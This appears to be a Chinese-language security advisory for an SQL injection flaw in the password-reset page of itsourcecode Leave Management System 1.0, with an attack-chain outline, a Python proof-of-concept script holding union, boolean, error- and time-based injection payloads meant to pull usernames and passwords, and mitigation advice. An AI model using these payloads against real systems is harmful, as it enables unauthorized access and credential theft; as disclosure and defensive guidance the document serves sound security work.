CVE-2025-11432：itsourcecode请假管理系统SQL注入漏洞

漏洞信息

漏洞编号

CVE-2025-11432

漏洞类型

SQL注入

CVSS评分

7.3 高危

攻击向量

网络 (AV:N)

认证要求

无需认证 (PR:N)

用户交互

无需交互 (UI:N)

影响产品

itsourcecode Leave Management System

漏洞概述

CVE-2025-11432是存在于itsourcecode Leave Management System 1.0版本中的一个SQL注入安全漏洞。该漏洞于2025年10月8日被公开披露，CVSS 3.1评分为7.3分，属于高危级别漏洞。漏洞位于系统的/reset.php文件中，具体涉及对employid参数的处理逻辑存在缺陷，攻击者可以通过构造恶意的SQL语句作为参数值，绕过应用程序的输入验证机制，直接与后端数据库进行交互。

itsourcecode Leave Management System是一款用于管理员工请假流程的开源Web应用程序，广泛应用于中小型企业的HR管理场景中。由于该系统的密码重置功能（reset.php）未对用户输入进行充分的过滤和参数化处理，导致SQL注入漏洞的产生。攻击者无需任何身份认证即可远程发起攻击，且无需用户交互配合，利用门槛极低。该漏洞的利用代码已公开传播，对部署了该系统的企业构成严重的数据安全威胁，可能导致员工个人信息、薪资数据等敏感信息泄露。

技术细节

该SQL注入漏洞的根本原因在于/reset.php文件在处理employid参数时，直接将用户输入拼接到SQL查询语句中，而未采用预编译参数化查询或充分的输入过滤机制。攻击者可以通过在employid参数中注入恶意的SQL片段（如UNION SELECT、OR 1=1等），改变原始查询的语义，实现未授权的数据访问。

具体利用方式如下：攻击者首先定位目标系统的/reset.php端点，然后构造包含SQL注入payload的HTTP请求，例如将employid参数设置为：1' OR '1'='1' -- 或 ' UNION SELECT username,password FROM users-- 等形式。当服务器端将恶意输入拼接到SQL语句中时，原始查询逻辑被篡改，攻击者可以绕过身份验证、提取数据库中的敏感信息（如用户名、密码哈希、个人信息等），甚至在特定条件下执行数据库管理操作（如读取/写入文件、获取操作系统权限）。

由于该漏洞的攻击向量为网络（AV:N）、攻击复杂度低（AC:L）、无需权限（PR:N）、无需用户交互（UI:N），且对机密性、完整性、可用性均存在低程度影响（C:L/I:L/A:L），使得该漏洞极易被自动化扫描工具和攻击框架大规模利用。

攻击链分析

STEP 1

步骤1：目标侦察

攻击者通过搜索引擎Shodan、Censys或直接扫描互联网，定位部署了itsourcecode Leave Management System 1.0的Web服务器，识别出/reset.php端点。

STEP 2

步骤2：漏洞探测

攻击者向/reset.php发送带有特殊SQL字符（如单引号、UNION SELECT等）的employid参数，检测服务器响应中是否包含SQL错误信息或异常行为，确认SQL注入漏洞的存在。

STEP 3

步骤3：注入Payload构造

攻击者根据数据库类型（MySQL/MariaDB）构造相应的SQL注入Payload，包括布尔型盲注、UNION联合查询、时间型盲注等多种方式，以提取数据库中的敏感数据。

STEP 4

步骤4：数据提取

攻击者利用构造好的Payload，逐步提取数据库中的管理员凭据、员工个人信息、薪资数据等敏感信息，或通过INFORMATION_SCHEMA获取数据库结构信息。

STEP 5

步骤5：权限提升与持久化

攻击者利用获取的管理员凭据登录系统后台，或通过SQL注入写入Webshell，获取服务器更高权限，实现持久化控制。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

# CVE-2025-11432 PoC - SQL Injection in itsourcecode Leave Management System 1.0
# Vulnerability Location: /reset.php
# Vulnerable Parameter: employid

import requests

TARGET_URL = "http://target-site.com/reset.php"
VULNERABLE_PARAM = "employid"

# Basic SQL Injection payload to test the vulnerability
payloads = [
    # Boolean-based blind SQL injection
    "1' OR '1'='1",
    "1' OR '1'='1' -- ",
    "1' OR '1'='1' #",

    # Union-based SQL injection (extract credentials)
    "1' UNION SELECT 1,2,3-- ",
    "' UNION SELECT username,password FROM users-- ",
    "' UNION SELECT NULL,username,password FROM users-- ",

    # Error-based SQL injection
    "1' AND (SELECT 1 FROM(SELECT COUNT(*),CONCAT((SELECT database()),0x3a,FLOOR(RAND(0)*2))x FROM information_schema.tables GROUP BY x)a)-- ",

    # Time-based blind SQL injection
    "1' AND SLEEP(5)-- ",
    "1'; WAITFOR DELAY '0:0:5'-- ",
]

def exploit_sql_injection(target_url, param, payload):
    """Send SQL injection payload to the vulnerable endpoint."""
    data = {param: payload}
    headers = {
        "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36",
        "Content-Type": "application/x-www-form-urlencoded"
    }
    try:
        response = requests.post(target_url, data=data, headers=headers, timeout=10)
        return response
    except requests.exceptions.RequestException as e:
        print(f"[ERROR] Request failed: {e}")
        return None

if __name__ == "__main__":
    print(f"[*] Testing CVE-2025-11432 against: {TARGET_URL}")
    for i, payload in enumerate(payloads, 1):
        print(f"\n[+] Payload {i}: {payload[:60]}...")
        resp = exploit_sql_injection(TARGET_URL, VULNERABLE_PARAM, payload)
        if resp and resp.status_code == 200:
            print(f"    Status: {resp.status_code}, Length: {len(resp.text)}")
            if "error" in resp.text.lower() or "warning" in resp.text.lower():
                print("    [!] Possible SQL error detected - vulnerability confirmed")
        else:
            print(f"    Status: {resp.status_code if resp else 'N/A'}")

影响范围

itsourcecode Leave Management System 1.0

防御指南

临时缓解措施

在官方补丁发布之前，建议采取以下临时缓解措施：1）通过Web应用防火墙（WAF）部署SQL注入防护规则，拦截针对/reset.php端点的恶意请求；2）在Web服务器层面限制对/reset.php文件的访问，仅允许可信IP访问该端点；3）修改源代码，将employid参数的处理方式改为预编译参数化查询；4）隐藏或禁用密码重置功能，直到漏洞被修复；5）加强数据库监控，检测异常的SQL查询行为；6）对数据库中的敏感信息进行加密存储，降低数据泄露后的影响。